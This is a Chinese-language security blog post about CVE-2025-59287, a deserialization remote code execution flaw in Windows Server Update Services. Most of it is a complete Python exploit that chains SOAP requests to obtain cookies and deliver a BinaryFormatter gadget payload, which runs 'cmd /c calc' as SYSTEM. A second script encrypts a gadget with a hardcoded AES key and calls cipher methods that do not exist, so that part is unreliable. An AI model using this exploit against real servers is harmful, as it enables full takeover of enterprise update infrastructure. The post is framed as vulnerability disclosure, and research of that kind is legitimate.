CVE-2025-59287|Windows 服务器更新服务 (WSUS) 远程代码执行漏洞(POC)
CVE-2025-59287|Windows 服务器更新服务 (WSUS) 远程代码执行漏洞(POC)
信安百科
发布于 2025-11-24 14:01:11
发布于 2025-11-24 14:01:11
0x00 前言
Microsoft Windows Server Update Services(WSUS)是微软推出的企业级集中式更新管理工具,专为 Windows 服务器、客户端及 Office 等微软相关产品设计,核心支持从微软更新服务器同步安全补丁、功能更新与驱动程序。
管理员可通过它集中测试、审批更新,结合组策略实现定向分组部署,同时监控更新状态、生成合规报告,既能避免终端自主更新的兼容性风险、节省网络带宽,又能确保 IT 环境及时修复漏洞,保障系统安全稳定与合规,是中大型企业 IT 运维的重要支撑。
0x01 漏洞描述
该漏洞存在于WSUS对AuthorizationCookie的处理流程中,系统在处理加密的Cookie数据时,采用.NET 的BinaryFormatter进行反序列化操作,却未对数据类型实施严格校验。
攻击者可精心构造恶意加密数据,通过GetCookie () 接口发送至目标系统,最终触发任意代码执行,且执行权限为SYSTEM级别。
0x02 CVE编号
CVE-2025-59287
0x03 影响版本
Windows Server 2025 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server 2025
Windows Server 2022, 23H2 Edition (Server Core installation)0x04 漏洞详情
POC:
https://github.com/jiansiting/CVE-2025-59287
cve-2025-59287-exp.py
#!/usr/bin/env python3
import requests
import urllib3
import xml.etree.ElementTree as ET
from datetime import datetime, timezone
import sys
import uuid
from xml.sax.saxutils import escape
# 禁用SSL证书验证警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def get_auth_cookie(target: str, server_id: str = None) -> str:
"""
获取认证Cookie
:param target: 目标服务器URL
:param server_id: 服务器唯一标识
:return: 认证Cookie字符串,失败返回None
"""
url = f"{target}/SimpleAuthWebService/SimpleAuth.asmx"
headers = {
'SOAPAction': '"http://www.microsoft.com/SoftwareDistribution/Server/SimpleAuthWebService/GetAuthorizationCookie"',
'Content-Type': 'text/xml'
}
# 生成服务器ID(如未提供)
if server_id is None:
server_id = str(uuid.uuid4())
# 构造SOAP请求体
soap_body = f'''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetAuthorizationCookie xmlns="http://www.microsoft.com/SoftwareDistribution/Server/SimpleAuthWebService">
<clientId>{server_id}</clientId>
<targetGroupName></targetGroupName>
<dnsName>hawktrace.local</dnsName>
</GetAuthorizationCookie>
</soap:Body>
</soap:Envelope>'''
try:
response = requests.post(
url,
data=soap_body,
headers=headers,
timeout=30,
verify=False
)
response.raise_for_status() # 触发HTTP错误状态码异常
# 解析响应提取CookieData
root = ET.fromstring(response.text)
for elem in root.iter():
if 'CookieData' in elem.tag and elem.text:
print(f"[+] 使用服务器ID: {server_id}")
return elem.text
except requests.exceptions.RequestException as e:
print(f"[-] 认证Cookie获取失败: {str(e)}")
except ET.ParseError as e:
print(f"[-] XML解析错误: {str(e)}")
return None
def get_server_id(target: str) -> str:
"""
获取目标服务器ID
:param target: 目标服务器URL
:return: 服务器ID字符串
"""
url = f"{target}/ReportingWebService/ReportingWebService.asmx"
headers = {
'SOAPAction': '"http://www.microsoft.com/SoftwareDistribution/GetRollupConfiguration"',
'Content-Type': 'text/xml'
}
# 构造SOAP请求体
soap_body = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetRollupConfiguration xmlns="http://www.microsoft.com/SoftwareDistribution">
<cookie xmlns:i="http://www.w3.org/2001/XMLSchema-instance" i:nil="true"/>
</GetRollupConfiguration>
</soap:Body>
</soap:Envelope>'''
try:
response = requests.post(
url,
data=soap_body,
headers=headers,
timeout=30,
verify=False
)
response.raise_for_status()
# 解析响应提取ServerId
root = ET.fromstring(response.text)
for elem in root.iter():
if 'ServerId' in elem.tag and elem.text:
print(f"[+] 服务器ID: {elem.text}")
return elem.text
except requests.exceptions.RequestException as e:
print(f"[-] 服务器ID获取失败: {str(e)}")
except ET.ParseError as e:
print(f"[-] XML解析错误: {str(e)}")
# 提取失败时生成备用ID
fallback_id = str(uuid.uuid4())
print(f"[!] 使用备用ID: {fallback_id}")
return fallback_id
def get_reporting_cookie(target: str, auth_cookie: str) -> dict:
"""
获取报表服务Cookie
:param target: 目标服务器URL
:param auth_cookie: 认证Cookie
:return: 包含过期时间和加密数据的字典,失败返回None
"""
url = f"{target}/ClientWebService/Client.asmx"
headers = {
'SOAPAction': '"http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetCookie"',
'Content-Type': 'text/xml'
}
# 生成UTC时间戳
timenow = datetime.now(timezone.utc).strftime('%Y-%m-%dT%H:%M:%SZ')
# 构造SOAP请求体
soap_body = f'''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetCookie xmlns="http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService">
<authCookies>
<AuthorizationCookie>
<PlugInId>SimpleTargeting</PlugInId>
<CookieData>{auth_cookie}</CookieData>
</AuthorizationCookie>
</authCookies>
<oldCookie xmlns:i="http://www.w3.org/2001/XMLSchema-instance" i:nil="true"/>
<lastChange>{timenow}</lastChange>
<currentTime>{timenow}</currentTime>
<protocolVersion>1.20</protocolVersion>
</GetCookie>
</soap:Body>
</soap:Envelope>'''
try:
response = requests.post(
url,
data=soap_body,
headers=headers,
timeout=30,
verify=False
)
response.raise_for_status()
# 解析响应提取Cookie信息
root = ET.fromstring(response.text)
cookie_data = {}
for elem in root.iter():
if 'Expiration' in elem.tag:
cookie_data['expiration'] = elem.text
elif 'EncryptedData' in elem.tag:
cookie_data['encrypted_data'] = elem.text
if 'encrypted_data' in cookie_data:
return cookie_data
except requests.exceptions.RequestException as e:
print(f"[-] 报表Cookie获取失败: {str(e)}")
except ET.ParseError as e:
print(f"[-] XML解析错误: {str(e)}")
return None
def send_malicious_event(target: str, cookie: dict) -> tuple:
"""
发送包含恶意Payload的事件请求
:param target: 目标服务器URL
:param cookie: 报表服务Cookie字典
:return: (是否成功, 事件ID, 目标SID)
"""
url = f"{target}/ReportingWebService/ReportingWebService.asmx"
# 生成随机ID和时间戳
target_sid = str(uuid.uuid4())
event_instance_id = str(uuid.uuid4())
timenow = datetime.now(timezone.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3]
# 恶意Payload(触发calc.exe的序列化数据)
popcalc = '''<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><a1:DataSet id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/System.Data/System.Data%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db77a5c561934e089"><DataSet.RemotingFormat xsi:type="a1:SerializationFormat" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/System.Data/System.Data%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db77a5c561934e089">Binary</DataSet.RemotingFormat><DataSet.DataSetName id="ref-3"></DataSet.DataSetName><DataSet.Namespace href="#ref-3"/><DataSet.Prefix href="#ref-3"/><DataSet.CaseSensitive>false</DataSet.CaseSensitive><DataSet.LocaleLCID>1033</DataSet.LocaleLCID><DataSet.EnforceConstraints>false</DataSet.EnforceConstraints><DataSet.ExtendedProperties xsi:type="xsd:anyType" xsi:null="1"/><DataSet.Tables.Count>1</DataSet.Tables.Count><DataSet.Tables_0 href="#ref-4"/></a1:DataSet><SOAP-ENC:Array id="ref-4" xsi:type="SOAP-ENC:base64">AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAswU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtMTYiPz4NCjxPYmplY3REYXRhUHJvdmlkZXIgTWV0aG9kTmFtZT0iU3RhcnQiIElzSW5pdGlhbExvYWRFbmFibGVkPSJGYWxzZSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgeG1sbnM6c2Q9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PVN5c3RlbSIgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KICAgIDxzZDpQcm9jZXNzPg0KICAgICAgPHNkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgICAgICA8c2Q6UHJvY2Vzc1N0YXJ0SW5mbyBBcmd1bWVudHM9Ii9jIGNhbGMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw==</SOAP-ENC:Array></SOAP-ENV:Body></SOAP-ENV:Envelope>'''
# 构造SOAP请求体
soap_body = f'''<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<ReportEventBatch xmlns="http://www.microsoft.com/SoftwareDistribution">
<cookie>
<Expiration>{cookie['expiration']}</Expiration>
<EncryptedData>{cookie['encrypted_data']}</EncryptedData>
</cookie>
<clientTime>{timenow}</clientTime>
<eventBatch xmlns:q1="http://www.microsoft.com/SoftwareDistribution" soapenc:arrayType="q1:ReportingEvent[1]">
<ReportingEvent>
<BasicData>
<TargetID>
<Sid>{target_sid}</Sid>
</TargetID>
<SequenceNumber>0</SequenceNumber>
<TimeAtTarget>{timenow}</TimeAtTarget>
<EventInstanceID>{event_instance_id}</EventInstanceID>
<NamespaceID>2</NamespaceID>
<EventID>389</EventID>
<SourceID>301</SourceID>
<UpdateID>
<UpdateID>00000000-0000-0000-0000-000000000000</UpdateID>
<RevisionNumber>0</RevisionNumber>
</UpdateID>
<Win32HResult>0</Win32HResult>
<AppName>LocalServer</AppName>
</BasicData>
<ExtendedData>
<MiscData soapenc:arrayType="xsd:string[2]">
<string>Administrator=SYSTEM</string>
<string>SynchronizationUpdateErrorsKey={escape(popcalc)}</string>
</MiscData>
</ExtendedData>
<PrivateData>
<ComputerDnsName></ComputerDnsName>
<UserAccountName></UserAccountName>
</PrivateData>
</ReportingEvent>
</eventBatch>
</ReportEventBatch>
</soap:Body>
</soap:Envelope>'''
# 构造请求头
host = target.replace('http://', '').replace('https://', '')
headers = {
'Connection': 'Keep-Alive',
'Content-Type': 'text/xml',
'Accept': 'text/xml',
'User-Agent': 'Windows-Update-Agent',
'SOAPAction': '"http://www.microsoft.com/SoftwareDistribution/ReportEventBatch"',
'Host': host
}
try:
response = requests.post(
url,
data=soap_body,
headers=headers,
timeout=30,
verify=False
)
response.raise_for_status()
if 'true' in response.text:
return True, event_instance_id, target_sid
else:
print(f"[-] 恶意事件发送失败,响应内容: {response.text[:200]}")
return False, None, None
except requests.exceptions.RequestException as e:
print(f"[-] 发送请求时出错: {str(e)}")
return False, None, None
def main() -> None:
"""主函数:执行漏洞利用流程"""
if len(sys.argv) < 2:
print("用法: python cve-2025-59287-exp.py <目标URL>")
print("示例: python cve-2025-59287-exp.py http://192.168.1.100:8530")
sys.exit(1)
target = sys.argv[1]
# 打印工具标识
print(r"""
-----------------------------
- CVE-2025-59287-EXP -
- By jiansiting -
-----------------------------
""")
# 执行漏洞利用流程
print("[+] 获取服务器ID...")
server_id = get_server_id(target)
print("[+] 使用服务器ID获取认证Cookie...")
auth_cookie = get_auth_cookie(target, server_id)
if not auth_cookie:
print("[-] 无法获取认证Cookie,退出流程")
return
print("[+] 获取报表服务Cookie...")
reporting_cookie = get_reporting_cookie(target, auth_cookie)
if not reporting_cookie:
print("[-] 无法获取报表服务Cookie,退出流程")
return
print("[+] 发送包含恶意Payload的事件...")
success, event_id, target_sid = send_malicious_event(target, reporting_cookie)
if success:
print("[+] 操作成功!")
print("[!] 远程代码执行可能已触发!")
else:
print("[-] 漏洞利用失败")
if __name__ == "__main__":
main()cve-2025-59287-encrypt.py
import base64
import os
from Crypto.Cipher import AES
def get_non_zero_bytes(length: int) -> bytes:
"""生成指定长度的非零随机字节"""
salt = bytearray()
while len(salt) < length:
# 生成单个非零随机字节
b = os.urandom(1)
if b != b'\x00':
salt.extend(b)
return bytes(salt)
def encrypt_payload(data: bytes, key: bytes) -> bytes:
"""实现AES-CBC加密"""
# 初始化AES加密器(CBC模式,无填充,IV为全0)
aes = AES.new(key, AES.MODE_CBC, iv=b'\x00' * 16) # IV固定为16字节0
encryptor = aes.encryptor()
block_size = AES.block_size # AES块大小固定为16字节
# 生成16字节非零salt
salt = get_non_zero_bytes(16)
# 加密salt(第一块)
salt_encrypted = encryptor.transform_block(salt, 0, len(salt))
# 处理数据的完整块部分
data_len = len(data)
num = data_len % block_size # 剩余字节数(不足一块的部分)
num2 = data_len - num # 完整块的总长度(能被16整除)
data_part1 = data[:num2] # 完整块数据
data_part1_encrypted = encryptor.transform_block(data_part1, 0, len(data_part1))
# 处理剩余字节(不足一块的部分,用0填充至16字节)
padded_block = bytearray(block_size)
padded_block[:num] = data[num2:] # 填充剩余数据,其余为0
padded_encrypted = encryptor.transform_block(padded_block, 0, len(padded_block))
# 拼接所有加密部分:salt加密结果 + 完整块加密结果 + 填充块加密结果
return salt_encrypted + data_part1_encrypted + padded_encrypted
def main():
# 密钥(从十六进制字符串转换为字节数组)
hex_key = "877C14E433638145AD21BD0C17393071"
key = bytes.fromhex(hex_key) # 转换为16字节密钥
# 待加密的Base64字符串
zfc = "AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAAcvYyBjYWxjBgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBg0AAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYOAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg8AAAAFU3RhcnQJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhUAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYWAAAAB0NvbXBhcmUJDAAAAAYYAAAADVN5c3RlbS5TdHJpbmcGGQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhoAAAAyU3lzdGVtLlN0cmluZyBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCgoAAA=="
# 解码Base64字符串为字节数组
ser = base64.b64decode(zfc)
# 加密数据
enc = encrypt_payload(ser, key)
# 转换加密结果为Base64字符串并输出
base64_payload = base64.b64encode(enc).decode()
print(base64_payload)
if __name__ == "__main__":
main()0x05 参考链接
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287/
推荐阅读:
CVE-2025-25256|Fortinet FortiSIEM 远程命令执行漏洞(POC)
CVE-2025-8088|WinRAR 路径遍历漏洞(POC)
CVE-2025-48799|Windows Update 服务本地权限提升漏洞(POC)
Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持
本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-11-15,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号